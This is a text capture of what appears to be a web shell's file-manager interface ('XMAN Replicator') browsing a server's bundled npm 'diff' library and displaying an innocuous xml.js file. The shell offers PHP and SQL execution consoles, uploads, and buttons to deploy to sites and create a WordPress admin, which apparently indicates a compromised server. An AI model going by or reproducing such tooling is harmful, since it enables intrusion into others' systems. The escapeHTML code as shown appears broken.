🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
alt-nodejs24
/
root
/
usr
/
lib
/
node_modules
/
npm
/
node_modules.bundled
/
diff
/
libesm
/
convert
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-05-14 17:41
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-05-14 17:41
🔄
🗑️
🗑️📁
⬇️
🔒
dmp.js
580 B
-rw-r--r--
2026-04-24 15:56
✏️
🔄
🗑️
⬇️
🔒
xml.js
781 B
-rw-r--r--
2026-04-24 15:56
✏️
🔄
🗑️
⬇️
🔒
Edit: xml.js
/** * converts a list of change objects to a serialized XML format */ export function convertChangesToXML(changes) { const ret = []; for (let i = 0; i < changes.length; i++) { const change = changes[i]; if (change.added) { ret.push('<ins>'); } else if (change.removed) { ret.push('<del>'); } ret.push(escapeHTML(change.value)); if (change.added) { ret.push('</ins>'); } else if (change.removed) { ret.push('</del>'); } } return ret.join(''); } function escapeHTML(s) { let n = s; n = n.replace(/&/g, '&'); n = n.replace(/</g, '<'); n = n.replace(/>/g, '>'); n = n.replace(/"/g, '"'); return n; }
Save
PHP Console
Execute
SQL Console
Execute